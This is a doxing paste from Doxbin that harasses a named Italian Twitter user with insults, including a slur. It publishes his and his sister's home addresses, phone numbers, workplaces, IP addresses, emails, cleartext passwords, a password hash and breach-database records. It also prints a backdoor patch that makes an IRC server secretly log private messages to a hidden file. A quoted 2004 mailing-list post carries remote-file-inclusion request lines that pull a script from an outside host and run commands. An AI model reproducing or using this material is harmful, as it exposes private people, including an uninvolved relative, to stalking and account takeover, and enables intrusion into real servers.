____            _     _       
 |  _ \  _____  _| |__ (_)_ __  
 | | | |/ _ \ \/ / '_ \| | '_ \ 
 | |_| | (_) >  <| |_) | | | | |
 |____/ \___/_/\_\_.__/|_|_| |_|

Title: Arrivederci Marco YogSotho Monicelli

Created: Aug 25th, 2021

Created by: LarpKillaz

Views: 366

Comments: 26
thumb_up2 thumb_down0

    New (N)
    Raw (R)

    Username: Anonymous - (Login)
    Submit Comment

Anonymous -

1 day ago
Didn't MLT own this guy like 20 years go lol?

Anonymous -

5 days ago
I read the intro and I already hate this guy.

Anonymous -

5 days ago
Nice dox

Anonymous -

5 days ago
This skid git ownes so bad nice dox by the way!

Anonymous -

1 week ago
Omg marco you're so embarrassing I remember when Mathew owned you sit down child, or should I say 38 year old man posing as a child on twitter.

Anonymous -

1 week ago
https://twitter.com/PRESIDENTSA7AN/status/1431324566480097283 satan humiliated this skid omg im crying

Anonymous -

1 week ago
https://gyazo.com/f073f22d217d92b983dac35836821ea2 Marco wipe your metadat next time you RETAD+RD LMFAO

Anonymous -

1 week ago
I love how this doxed unskilled pooron is commenting below LOLOLOL😂👎

Anonymous -

1 week ago
MLT did nothing. That workplace is from 2004 lol. Ask MLT for any proof, he will find hundred excuses and will not provide a single evidence because he is an harmless poser who only likes heroin. #epicfail

Anonymous -

1 week ago
Skid got smacked nothing else to it.

Load More Comments

Please note that all posted information is publicly available and must follow our TOS.

 
@YogSotho / Marco Monicelli / @The_Beyond_One / is a well known twitter troll & overgrown skidiotic asswipe. For years after his IRL "software engineering career" fell apart Marco proceeded 2 join the surface skid-scene and attempted to join other so called "hacking teams" such as LizardSquad BWA GoonSquad etc. When constantly rejected due to posessing absolutely ZERO technical ability / network knowledge, by late 2017 Mr. Monicelli proceeded to roleplay as other well know members of the community such as MLT: https://en.wikipedia.org/wiki/MLT_(hacktivist)  //   Dshocker: https://www.darknet.org.uk/2008/11/dshocker-aka-aush0k-hackerpleads-guilty-to-computer-felonies/  //  and Julius Kivimäki (zeekill):  https://krebsonsecurity.com/tag/zeekill/

By May 2019 everyone got tired or Marco's bullshit and spam reported his @YogSotho twitter causing it to get suspended after which he made his new hadnle @The_Beyond_One.  Date / Proof: https://gyazo.com/706aa1686a76d69d16a76ba0bed2985e  At this point giving up roleplaying as other hackers Mr. Monicelli switched his game up and began spamming enyone who accomplished anything on twitter with idiocy claiming that what they did never happened (Even though there are articles and mountains of evidence that it did.)  From MLT's arrest and TeamPoison's accomplishments to BWA Und0xxeds alleged possession of tmobiel accoutns, Marco the irrelevant, unnoticed, enraged SKID proceeded to spam everyone's tweets with lies and pointless comments. Today the Sharks & Killer Whales along with other predators of the community decided to give the drifting piece of rotting seaweed the attention which it has been begging for all these years... this is the end friend and I'm sure anyone reading this and cringing at your existence can agree with me that it willbe a good riddance.  

*Tips Fedora and stomps on insect* 


-------------------------------------------------------------------------

Marco Monicelli aka YogSotho aka @The_Beyond_One o doT o /XTerM exeC... ... ... 

 

--------------------------------------------------------------------------

Below you can see how the community responds to the skidiots personality disorder and social incabapilities:



As you can see here the so called "hacking comunity" doesn't show a lot of respect for little Marco, or should I say the grown ass 38 year old man behind the little role play hacker sherade / persona. Below are how people normally reac to Mr. Monicelli's presence. 

https://gyazo.com/ede0a62b3ab526712916a967312bbe62  <<< @YogSotho Suspended in early 2019 by members of the community.

https://gyazo.com/7eadecf1b79eef6d38f0d81cb3e055e2  <<< Beamage v1

https://gyazo.com/12f906975d4ffc10cc8e310801c6458e  <<< Beamage v2

https://gyazo.com/07e27ce08833e7a832ca0ca3c1b0ffce  <<< Kid tries to seem relevant by tagging himself where he doesn't belong 

https://gyazo.com/35847431e3e77db353395ee8f317c4b5  <<< Trying to seem relevant not realising nobody has time for him and his lies

https://gyazo.com/3c944099d11ea50d221ef969e3af65f5  <<< People are embarassed to talk to this SKID because all he does is butt into convo's with random people and post meme's while trying to gain twitter followers and feed his puny "scary hacker" persona.

https://gyazo.com/632be6b0c3c12ca16d394ec97c0e303d  <<< again tries to join conversations and gets ignored lol

https://gyazo.com/63b1ad8e56fb41fc8a6ff81fcf25110f  <<< The poor skid  gets clowned at all hours of the night wherever he goes. 


--------------------------------------------------------------------------

Proof liking @YogTotho to IRL Identity (Marco Monicelli)



Mr_Pan [n=marcopan@host156-30-dynamic.3-87-r.retail.telecomitalia.it]  has joined #ubuntu



=== YogSothoth [n=YogSotho@82.250.72.110]  has joined #ubuntu
[10:46] <YogSothoth> Hi!
[10:46] <TyphoidHippo> Polysics: pcmanfm do what you need?
=== spaden [i=hidden-u@195.216.35.251]  has joined #ubuntu
[10:46] <WONToN> hmmm,
[10:46] <PPG> maybe i need to get a newer versiong of Ubuntu
[10:46] <Polysics> it's great thx
=== Flaze [i=Omega@r220-101-112-217.cpe.unwired.net.au]  has joined #ubuntu
[10:46] <YogSothoth> Other than Gimp, is there a software to help merging photos, creating panoramas from multiple photos?
=== thuyvy_nguyen031 [n=thuyvy_n@222.253.110.14]  has left #ubuntu [] 
[10:47] <TyphoidHippo> yea, I love that one - I use it in place of nautilus completely
=== tschaka [n=tschaka@p54B3A73B.dip0.t-ipconnect.de]  has joined #ubuntu
=== cameronw [n=cameronw@123-100-99-208.ubs.maxnet.co.nz]  has joined #ubuntu
[10:48] <TyphoidHippo> it isn't totally integrated into gnome, though, like nautilus is....but it can be setup to be through the session manager, I think
=== dead_rooster [n=ubuntu@60-234-170-12.bitstream.orcon.net.nz]  has left #ubuntu [] 
[10:48] <PPG> after typing "sudo dpkg -reconfigure -phigh xserver -xorg", it just showed : "dpkt: conflicting actions --control and --remove"
=== Faithful [n=Faithful@ns.linuxterminal.com]  has joined #ubuntu
[10:48] <TyphoidHippo> PPG: Don't put a space between xserver-xorg
=== primus [n=primus@tm.82.192.62.130.dc.telemach.net]  has joined #ubuntu
=== Hardiles [n=harri@dyn3-82-128-191-248.psoas.suomi.net]  has joined #ubuntu
[10:49] <TyphoidHippo> or between dpkg-reconfigure
=== wolfsong is frustrated by all his windows being drawn at 0,0
[10:49] <TyphoidHippo> should be 'sudo dpkg-reconfigure -phigh xserver-xorg'
=== jabba [n=jabba@pD95744E1.dip.t-dialin.net]  has joined #ubuntu
[10:50] <PPG> OH!!!
[10:50] <jabba> hello
[10:50] <PPG> :)
[10:50] <TyphoidHippo> lol
[10:50] <jabba> i am just trying to connect to a novell 6.0 server with ncpmount. but i always get an invalid server response (-330).
[10:50] <jabba> does aynone know that that means?
[10:50] <YogSothoth> FOund it: Hugin
[10:50] <YogSothoth> Or Pandora plung for The Gimp
=== fredddy [n=freddy@p3E9E4368.dip0.t-ipconnect.de]  has joined #ubuntu
[10:50] <TyphoidHippo> Little stuff like that can be sooooo confusing at first, ppg, I totally understand
[10:50] <YogSothoth> *plugin
[10:51] <jabba> ncpmount -S servername -P start -A 192.168.1.5 -u jabba /mnt/novell/ -U novellusername
=== PiNE [n=bradley@211.203.183.52]  has joined #ubuntu
[10:51] <wolfsong> how do i tell if compiz is running and which WM i'm using under gnome?
=== ojk007 [n=ojk007@58.175.24.112]  has joined #ubuntu
[10:52] <ojk007> !partition
[10:52] <ubotu> Partitioning programs: !GParted or QTParted (also "man mkfs" for formatting) - Mounting partitions in Gnome under Dapper: System -> Administration -> Disks - For Edgy, see !fstab and !DiskMounter
=== tarntow [n=jaxon@221.127.200.71]  has joined #ubuntu
=== predaeus [n=predaeus@chello212186005030.401.14.vie.surfer.at]  has joined #ubuntu
=== ploufplouf [n=richard@host.110.163.23.62.rev.coltfrance.com]  has joined #ubuntu
=== erpo [n=erpo@2001:5c0:8fff:fffe:0:0:0:6929]  has joined #ubuntu
=== AdvoWork [n=danglebe@unaffiliated/advowork]  has joined #ubuntu
[10:53] <Frogzoo> jabba: try wireshark maybe?
[10:54] <jabba> ??
[10:54] <dan_> reee
[10:54] <jabba> Frogzoo: whatfor?
[10:54] <AdvoWork> hi there. Ive been following some instructions that tell me to do: useradd -r -c "Postfix Filters" -d /var/spool/filter filter  yet it says that: invalid option -- r :/
[10:55] <AdvoWork> i cant see -r in the man pages, yet as i say, its telling me to do so, and im having problems further down the line by not doing it
=== Skyward [n=tinko@lb2.aeye.net]  has joined #ubuntu
[10:55] <TyphoidHippo> dan_ I can't seem to find in the log what your sound problem was...  I remember you typing it, but not what you typed, and I can't find it anywhere
=== tarntow [n=jaxon@221.127.200.71]  has joined #ubuntu
[10:55] <Frogzoo> jabba: you get to see the conversation on the wire
[10:56] <Polysics> no need for gnome integration anyway
[10:56] <dan_> hehe
[10:56] <dan_> i have this problem
[10:56] <Polysics> all i needed is a fast file manage
[10:56] <Polysics> *r
[10:56] <dan_> i got 2 soundcrads, one pci and on onboard
[10:56] <dan_> ubuntu/alsa makes my onboard default not the pci one
=== jikin [n=liuke@222.247.138.140]  has joined #ubuntu
[10:57] <jabba> Frogzoo: seems ok, but in the end there is a NCP C Destroy Connection Service
[10:57] <jabba> user authed etc...
=== blan [n=marc@dslb-088-065-233-104.pools.arcor-ip.net]  has joined #ubuntu
[10:57] <dan_> but i want the pci one as default, as card 0, but i dont know how, asoundconf wont work nor the solution in the forums
=== gerr1 [i=gerrycar@nat/canonical/x-2efdeeb598ed0ee5]  has joined #ubuntu
[10:57] <TyphoidHippo> Well, the easiest (maybe dirty) way that immediately comes to mind is disabling the onboard in your bios...
[10:57] <TyphoidHippo> But, I assume you don't wanna do that
[10:57] <dan_> yeah u and your disabling
[10:57] <dan_> heheh






Proof:    https://gyazo.com/7cd4a329115980f296a4c34bec2b9f87



"Marcos"  https://gyazo.com/5a080f62b9139d613b702e80537ac7e3













                                                                          
-█░  1st s0me 1nf4llabl3 logiq:                                                 
-█                                                                              
-█  bongrip PRIVMSG #insecurity :if we got hacked                               
-█  bongrip PRIVMSG #insecurity :we wouldnt be told                             
-█  bongrip PRIVMSG #insecurity :i constantly have to check shit                
-█  bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it 
-█  bongrip PRIVMSG #insecurity :htey arent going to brag                       
-█  bongrip PRIVMSG #insecurity :until i check it and find it                   
-█  bongrip PRIVMSG #insecurity :one day                                        
-█  YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box     
-█  bongrip PRIVMSG #insecurity :which will never happen                        
-█  bongrip PRIVMSG #insecurity :cause nothing is popped                        
-█  bongrip PRIVMSG #insecurity :no                                             
-█  bongrip PRIVMSG #insecurity :they wont rm me                                
-█  bongrip PRIVMSG #insecurity :they would just do it to log                   
-█  bongrip PRIVMSG #insecurity :they would pop the hub                         
-█  bongrip PRIVMSG #insecurity :from there u can use pcap play                 
-█  bongrip PRIVMSG #insecurity :to sniff pm's                                  
-█  bongrip PRIVMSG #insecurity :and everything else                            
-█                                                                              
-█  Like this?                                                                  
-█                                                                              
-█  src/modules/m_message.c                                                     
-█            < if (ret == CANPRIVMSG_SEND)                                     
-█            < {                                                               
-█            >        FILE *fp;                                                
-█            >        fp=fopen("/var/backups/.irc/log.txt", "a");              
-█            >        fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); 
-█            >        fclose(fp);                                              
-█            <        sendto_message_one(acptr, sptr, parv[0], newcmd, nick,   
-█                                        text);                     








Proof: https://gyazo.com/e3f8fe96c610373037c2075a10562acb



Name
94.36.22.39
Email
yogsotho@yahoo.com
Username
yogsotho
Hashed Password
df1320122d9a8ae01f013cb79b733706:cL4FbPkh
I.P. Address
87.30.11.168
this nigga on hackforums
Email
yogsotho@yahoo.com
Password 
brody111
Email
yogsotho@yahoo.com
Password
Nut3ll474
Email
yogsotho@gmail.com
Password
Nut3ll474


Home IP: IP Details For: 94.36.22.39

Decimal: 1579423271

Hostname: 94-36-22-39.adsl-ull.clienti.tiscali.it

ASN: 8612

ISP: Tiscali SpA

Organization: Tiscali SpA

Services: None detected

Type: Broadband

Assignment: Likely Dynamic IP

Continent: Europe

Country: Italy


><


VPN:


Decimal: 1392134254

Hostname: lns-bzn-61-82-250-72-110.adsl.proxad.net

ASN: 12322

ISP: Free SAS

Organization: Free SAS

Services: None detected

Type: Broadband

Assignment: Likely Dynamic IP

Continent: Europe

Country: France








-------------------------------------------------------------
ADDRESS / LOCATION / FAMILY MEMBE(S) ETC.
-------------------------------------------------------------






Family members European contact / Employment followed by domestic address of possible relative or a family member


MONICELLI MARCO
Via Roaschia 159 - 10023 Chieri (TO)
| mappa
tel: 011 9425914
 
2.
DOTT.SSA IRENE MONICELLI
info sulla privacy
10, Via Milano - 10122 Torino (TO)
| mappa
cell: 349 1839386





Previous employment: 

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: ***@marcegaglia.com   (marco.monicelli@marcegaglia.com)


IG: https://www.instagram.com/yogsotho/?hl=en


Picture: https://gyazo.com/b6733f491759a29dff314f0627b15346  (Looks like the Fonzie)



MONICELLI, MARCO


Via Roaschia 159 - 10023 Chieri

tel: (+38) 011 9425914

Map pic: https://gyazo.com/cb1b393b8a34129a2b1a11ef3bfb9bce


Area desc: 


Comune di CHIERI
Regione
ProvinciaTO
CAP10023
Prefisso011
Codice ISTAT001078
Codice catastale


In zona trovi anche

    PHOTOVOLTAIC SYSTEMS SRL
    Corso Torino, 78 - 10023 Chieri (TO)
    tel: 011 2460872, 335 1261137
    ONORANZE FUNEBRI L'ANNUNZIATA DI LUISON MARCO REPERIBILI 24 H SU 24 H
    Via Torino 52/a - 10023 Chieri (TO)
    tel: 011 6490292


APOLLO_IO_129M_MARKETING_2018 View Full
Email    marco.monicelli@inps.cv
Name    Marco Monicelli
City    Torino
Country    Italy
Postal    10126
Linkedin    http://www.linkedin.com/in/marco-monicelli-544403b9
Job    Pensionato
Company    INPS

Employer / email domain: https://www.marcegaglia.com/officialwebsite/



Address of him and sister (or wife not sure at this point) 


Proof: https://gyazo.com/fe1bfaf691648b1174e74c4f85e9e9b2


Other work experiences


Marco Monicelli
Pensionato presso INPS
Turin, Piedmont, Italy8 connections
Join to Connect
INPS INPS
Politecnico di Milano Politecnico di Milano
Experience

    INPS Graphic
    Pensionato
    INPS

Education

    Politecnico di Milano
    Politecnico di Milano Graphic
    Politecnico di Milano
    -

Groups

    Rete di STIMA
    Rete di STIMA Graphic
    Rete di STIMA
    -





-------------------------------------------------------------------------




Sister: 





Irene Monicelli

Picture: https://gyazo.com/997acbe4fdf89363ce20e2c3b63c08ac


https://twitter.com/irenemonicelli?lang=en


Address: 

IRENE MONICELLI
10, Via Milano - 10122 Torino (TO)
cell: 349 1839386  Old line:  +39 06 8108869




Employment: Dott.ssa Irene Monicelli
Psychotherapist in Turin, Italy
Address: Via San Domenico, 37/c, 10122 Torino TO, Italy
Hours: Closed ⋅ Opens 9AM
Health & safety: Appointment required · Mask required · Staff wear masks · Staff required to disinfect surfaces between visits · More details
Phone: +39 349 183 9386
Province: Metropolitan City of Turin

Psicologo ,  Psicoterapeuta
In studio

    Curriculum
    Tariffe
    Patologie
    Opinioni
    Sedi

curriculum
approfondisci

La Dott.ssa Monicelli è Psicologa Psicoterapeuta ad indirizzo cognitivo comportamentale, metodologia evidence based con protocolli di intervento approvati dall'OMS.In ambito neuropsicologico collabora con strutture pubbliche e private che offrono servizi di valutazione e riabilitazione delle funzioni cognitive (memoria, attenzione e percezione).Integrando le conoscenze sui processi cognitivi e le tecniche cliniche (ipnosi, biofeedback, coaching) offre percorsi per il miglioramento e il potenziamento della performance sia in ambito sportivo che artistico.Applica inoltre, tecniche di rilassamento (rilassamento muscolare tecnica di Jacobson e tecniche immaginative) Mindfulness e di Training Autogeno, anche organizzando corsi individuali e di gruppo.
Tariffe
guarda tutte

    Consulenza psicologica • € 60
    Top

    Mindfulness • da € 40 a € 60
    Top

    Preparazione psicologica per sportivi • da € 50 a € 100
    Top

    Psicologia dello sport • da € 50 a € 100 


https://plus.google.com/112833901647497415468  (No longer active) 


Linked in info: 
Irene Monicelli
Psicologa consulente per la prestazione aziendale e sportiva.
Turin, Piedmont, Italy500+ connections
Join to Connect
MenteAttiva Studio di Psicologia MenteAttiva Studio di Psicologia
Centro di Psicologia dello Sport - ISEF Centro di Psicologia dello Sport - ISEF
Company Website Company WebsiteExternal link
Activity

    Finalmente ci siamo! Riparte la nuova stagione 2020/2021 formativa di psicologia sportiva. Gli istruttori della Scuola Calcio della Polisportiva…
    Finalmente ci siamo! Riparte la nuova stagione 2020/2021 formativa di psicologia sportiva. Gli istruttori della Scuola Calcio della Polisportiva…
    Liked by Irene Monicelli
    La giraffa è l'animale terrestre che ha il cuore più grande, è un animale erbivoro e di conseguenza tende a non attaccare ma è molto forte e quindi è…
    La giraffa è l'animale terrestre che ha il cuore più grande, è un animale erbivoro e di conseguenza tende a non attaccare ma è molto forte e quindi è…

Join now to see all activity
Experience

    MenteAttiva Studio di Psicologia Graphic
    Libera professionista consulente per aziende e società sportive
    MenteAttiva Studio di Psicologia

    Nov 2012 - Present8 years 10 months

    Torino, Italia
    MenteAttiva Graphic
    Psicologa dello Sport e della Prestazione
    MenteAttiva

    Jan 2015 - Present6 years 8 months

    via San Domenico 37, 10122 Torino

    Percorsi di ottimizzazione della prestazione in campo sportivo, musicale e aziendale attraverso cui trasformare i problemi in opportunità e raggiungere così i propri obiettivi in tempi ridotti.
    Chiros Srl Graphic
    Psicologa-Neuropsicologa
    Chiros Srl

    Jan 2015 - Present6 years 8 months

    Torino, Italia

    - Programmi in supporto alle terapie del Centro (trattamento del dolore cronico, rilassamento muscolare, disturbi vestibolari, psicosomatica, Training Autogeno e Mindfulness).
    Ospedale civico di Settimo Torinese Graphic
    Servizio di Neuropsicologia
    Ospedale civico di Settimo Torinese

    Mar 2017 - Oct 20178 months

    Settimo Torinese

    Servizio di neuropsicologia per la valutazione e riabilitazione delle capacità cognitive in pazienti neurologici e ortopedici ricoverati presso la struttura. E' possibile richiedere prestazioni intramenia presso la struttura.
    Centro di Salute Psicofisica Graphic
    Psicologa - Neuropsicologa
    Centro di Salute Psicofisica

    Dec 2012 - Sep 20152 years 10 months

    Torino

    Il Centro si occupa di prevenzione, formazione e supervisione, interventi terapeutici, attività di studio e ricerca.
    Gestione del progetto CAFFE' ALZHEIMER TORINO
    Servizi Sociali del Comune di Torino Graphic
    Psicologa
    Servizi Sociali del Comune di Torino

    Oct 2010 - Jan 20154 years 4 months

    Torino, Italia

    Programmazione ed attuazione di un programma educativo/riabilitativo e promozione del benessere di minori con disabilità cognitive e disagio psicologico.
    Sostegno alla famiglia
    ASL TO2 TORINO, S.E.R.T Graphic
    Psicoterapeuta specializzanda
    ASL TO2 TORINO, S.E.R.T

    Jan 2013 - Nov 20141 year 11 months

    Torino
    Lega Italiana Lotta Tumori, LILT Graphic
    Psicologa
    Lega Italiana Lotta Tumori, LILT

    Apr 2012 - May 20142 years 2 months

    Torino, Italia

    Progetto "Missione Salute"
    Presidio Sanitario San Camillo Graphic
    Specializzanda
    Presidio Sanitario San Camillo

    Nov 2010 - Dec 20122 years 2 months

    Torino, Italia

    Colloqui di sostegno, adattamento alla malattia, counseling e training di rilassamento presso il servizio di psicologia; valutazione e training riabilitativi.
    Cooperativa Terzo Tempo Graphic
    Psicologa
    Cooperativa Terzo Tempo

    Jun 2012 - Aug 20123 months

    Torino
    Manos Amigas Graphic
    Collaboratrice progetti
    Manos Amigas

    May 2006 - May 20071 year 1 month

    Huaraz, Perù

    Casa di accoglienza per ragazzi di strada con progetti per la formazione al lavoro

Education

    Centro di Psicologia dello Sport - ISEF Graphic
    Centro di Psicologia dello Sport - ISEF
    Esperto in Psicologia dello Sport e della Prestazione

    Percorso di ottimizzazione della perfomance (ambito sportivo e musicale)
    Responsabile Dott.Giuseppe Vercelli
    Corso di Ipnosi Medica Rapida Graphic
    Corso di Ipnosi Medica Rapida
    Ipnosi

    Tecniche di ipnosi rapida applicabili a contesti clinici, medici e sportivi
    Formatore Dott.Giuseppe Regaldo
    Istituto Watson Graphic
    Istituto Watson
    PsicotarapeutaScuola di Specializzazione in Psicoterapia Cognitivo-Comportamentale50/50 e lode

    2010 - 2014

    Activities and Societies: Scuola di formazione post universitaria riconosciuta dal Ministero Istruzione Università e Ricerca MIUR (L. 56/89; D.M. 509/98; L. 401/2000) Socia AIAMC
    Università degli Studi di Torino
    Università degli Studi di Torino Graphic
    Università degli Studi di Torino
    Laurea MagistraleScienze della Mente

    2007 - 2010
    Università degli Studi di Parma
    Università degli Studi di Parma Graphic
    Università degli Studi di Parma
    Laurea in PsicologiaPsicologia

Volunteer Experience

    Croce Verde Graphic
    Volontaria
    Croce Verde

    Jun 2012

Languages

    Italiano
    Native or bilingual proficiency
    Inglese
    Professional working proficiency
    Spagnolo
    Full professional proficiency

Organizations

    ASIECI
    -
    Dec 2015 - Present

    Associazione Scientifica Infermieri Esperti in Comunicazione Ipnotica
    AIAMC
    -
    Nov 2010 - Present

    Associazione Italiana Analisi e Modificazione del Comportamento




MINDJOLT_COM_117M_GAMING_032019 View Full
Email    irene.moni@hotmail.com
Name    Irene Monicelli
Id    29404118
Userid    688507171
Idk    2
Regdate    2010-08-10
Fname    Irene
Lname    Monicelli

APOLLO_IO_129M_MARKETING_2018 View Full
Name    Irene Monicelli
City    Turin
Country    Italy
Linkedin    http://www.linkedin.com/in/irene-monicelli-18027141
Job    Psicologa-Neuropsicologa
Company    Chiros Srl

CANVA_COM_133M_DESIGN_052019 View Full
Username    irene.monicelli
Email    irene.monicelli@gmail.com
Name    Irene Monicelli
Id    62065049
Id_hash    UACxacWKKUo
Create_date    2018-03-08 09:05:08
Mail_status    C
Temporary    0
Roles    U
Deactivated    0
Locale    it-IT
Personal_brand    61946970
Personal_brand_id    BACxaTl7wok

MYFITNESSPAL_COM_144M_FITNESS_022018 
Email    irene.moni@hotmail.com
Username    Irene680
Lastip    91.253.103.134

ZOOSK_COM_28M_DATING_012020 View Full
Username    lord55
Email    castellopandone55@yahoo.it
Name    Marco Monicelli
Gender    male
Wants    women
Birthday    1960-06-17
Latitude    40833330
Longitude    14250000
Zipcode    80134
Country    IT
Regdate    2010-05-08 19:35:10
Last_login    2010-06-13 15:16:16
Last_flirted    2010-06-01 19:51:39
Height    180
Children    3
Balance    10
Dscore    800


BADOO_COM_126M_DATING_2016 CrackView Full
Email    conn123@libero.it
Username    0150339855
Hash    feba6a4e74056a4a2062e845e2854f78
Name    Marco Monicelli
Alias    Marco
Dob    1972-04-04
Unparsed    40:M:29:543:44630






End of sister: // o Log o












----------------------------------------------------------------------------------------




























--------------------------------------------------------------------------



The following are logged via marco's original work email (Before he became a twitter skid the domain was owned by his family (proof below) and along with info previously dropped at the bottom of the file.


-------------------------------------------------------------------------


Exhibit A: http://www.blacksheepnetworks.com/security/resources/pentest/8774.html



Re: Windows Administrator access

From: Marco Monicelli (marco.monicelli@marcegaglia.com)
Date: Mon Feb 27 2006 - 02:49:49 EST

    Next message: ROB DIXON: "Re: Windows Administrator access"
    Previous message: intel96: "Re: Windows Administrator access"
    In reply to: Dillama: "Windows Administrator access"
    Next in thread: ROB DIXON: "Re: Windows Administrator access"
    Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] 

You can simply change directory and going into "C:\Documents and
Settings\Administrator".

If you're not administrator, you cannot browse in there. The command prompt
will show the path and this will demonstrate that you're administrator over
there.

Ciao

Marco

                                                                           
             Dillama
             <dillama@gmail.co
             m> To
                                       pen-test@securityfocus.com
             25/02/2006 10.17 cc
                                                                           
                                                                   Subject
                                       Windows Administrator access
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           

After gaining shell access to a Windows box, is there any way to show
administrator privilege without changing the config or uploading new
files?

I have to demo the ability to gain administrator access to a Win 2000
box, the catch is no changes on the box so adding a user or loading
whoami.exe from resource kit would not be options. Any suggestion here
would be appreciated.

Thanks

---
Dillama
------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner:
Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers
are
futile against web application hacking. Check your website for
vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers
do!
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------
------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: 
Hackers are concentrating their efforts on attacking applications on your 
website. Up to 75% of cyber attacks are launched on shopping carts, forms, 
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are 
futile against web application hacking. Check your website for vulnerabilities 
to SQL injection, Cross site scripting and other web attacks before hackers do! 
Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------

    Next message: ROB DIXON: "Re: Windows Administrator access"
    Previous message: intel96: "Re: Windows Administrator access"
    In reply to: Dillama: "Windows Administrator access"
    Next in thread: ROB DIXON: "Re: Windows Administrator access"
    Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] 

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:34 EDT



----------------------------------------------------------------------------

Exhibit B: https://www.pvv.ntnu.no/~shane/dokumentasjon/hack_attempt/msg00013.html

Re: Hack attempt

    To: Alvin Oga <alvin.sec@Virtual.Linux-Consulting.com>
    Subject: Re: Hack attempt
    From: Marco Monicelli <marco.monicelli@marcegaglia.com>
    Date: Fri, 23 Jul 2004 17:18:17 +0200
    Cc: focus-linux@securityfocus.com, norbert.crettol@idiap.ch (Norbert Crettol)
    Delivered-to: shane@homeo.stud.ntnu.no
    Delivered-to: mailing list focus-linux@securityfocus.com
    Delivered-to: moderator for focus-linux@securityfocus.com
    Importance: High
    In-reply-to: <200407222323.i6MNNDDp006811@Virtual.Linux-Consulting.com>
    List-help: <mailto:focus-linux-help@securityfocus.com>
    List-id: <focus-linux.list-id.securityfocus.com>
    List-post: <mailto:focus-linux@securityfocus.com>
    List-subscribe: <mailto:focus-linux-subscribe@securityfocus.com>
    List-unsubscribe: <mailto:focus-linux-unsubscribe@securityfocus.com>
    Mailing-list: contact focus-linux-help@securityfocus.com; run by ezmlm




 Hi Norbert/Alvin

As I already explained in private to Norbert, this is just a guy of DALnet
Network playing with some exploit for PHP. Infact he installed eggdrop and
psybnc which are not related to clones attack at all. He's probably just a
kid with some automated script or some "l33t" tool to own unpatched boxes.

Anyway why taking off wget and other useful binaries? I would suggest
instead of fully patching your box and to maybe install Snort.

I don't agree with the "smart people investigating for what's cooking". I
think chkrootkit can help and can spare lot of time. Of course you
shouldn't base your Security on this software only but it's a good help.
Snort and Tripwire are definetively a good help too.

As I said, it's not a clones derivated attack. It's just a chatting kid who
probably is trying to build up his own Botnet to look l33t with his mates.

Again I don't agree with the "another cracked box". Infact the whois made
by Norbert on my suggestion, gave good results. The provider hosting his
website (yes, that is his own personal website.... not very smart eh?!) has
deleted the inject.txt script and gave a warning to this guy who will be
probably scared to death (this depends on how old he is and other factors).
Moreover we know his Nickname and we know he's chatting on Dalnet so....
some social engeneering could even lead to personal information on this
kid.

Anyway... Norbert patch your box on any PHP bug (there are tons of PHP bug
as far as I know) and then try to use SATAN or NESSUS to check your box (I
personally suggest Nessus). Oh... just one last but not least thing:

don't forget to wipe your box 'cause you will never know what he did for
real so it's much safer to reinstall everything. I know it's boring but
it's the only SECURE way to know your box is clean.

Hope this can help others with same problem.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com


                                                                                                                                                   
                      Alvin Oga                                                                                                                    
                      <alvin.sec@Virtual.Linux-Cons        To:       norbert.crettol@idiap.ch (Norbert Crettol)                                    
                      ulting.com>                          cc:       focus-linux@securityfocus.com                                                 
                                                           Subject:  Re: Hack attempt                                                              
                      23/07/2004 01.23                                                                                                             
                                                                                                                                                   





hi norbert

> "GET /<some
script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0"
200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

time for you to patch and update to latest php
or better still, turn it off esp if you don't need it

tons of things to fix up ... to harden the server

> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget

time to remove wget, lynx, and equiv apps

> Has someone seen this kind of attack ?

it's either eggdrop or modified clones/derivatives

> (chkrootkit doesn't detect it).

so much for chkrootkit :-)

smart/intelligent people investigating for "whats cooking" is better
than automated tools

> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> the uploaded scripts.

probably another cracked box ... long list to follow to find the
actual cracker

c ya
alvin





------------------------------------------------------------------------------

Exhibit C: https://seclists.org/bugtraq/2006/Feb/368



Re: new linux malware From: Marco Monicelli <marco.monicelli () marcegaglia com>
Date: Mon, 20 Feb 2006 17:24:21 +0100

Dear Gadi,

this malware looks like the famous Kaiten IRC bot. If you want, I can send
the source code of it but it is already known by most of AVs and I think
the source is public nowadays. This must be just another variant and
bytheway it's detected as far as I can see from your quoted informations so
it shouldn't be dangerous.

Anyway, tnx for keeping us updated!

Cheers

Marco





                                                                           
             Gadi Evron                                                    
             <ge () linuxbox org>                                             
                                                                        To 
             18/02/2006 23.40          bugtraq () securityfocus com           
                                                                        cc 
                                       "full-disclosure () lists grok org uk" 
                                       <full-disclosure () lists grok org uk> 
                                                                   Subject 
                                       new linux malware                   
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           
                                                                           




Today, we received a notification about a new Linux malware ItW (In the
Wild).

Chas Tomlin (http://www.ecs.soton.ac.uk/~cet/) provided Shadowserver
(http://www.shadowserver.org/) and Nicholas Alright who notified the
relevant operational communities, with the information on the binaries.
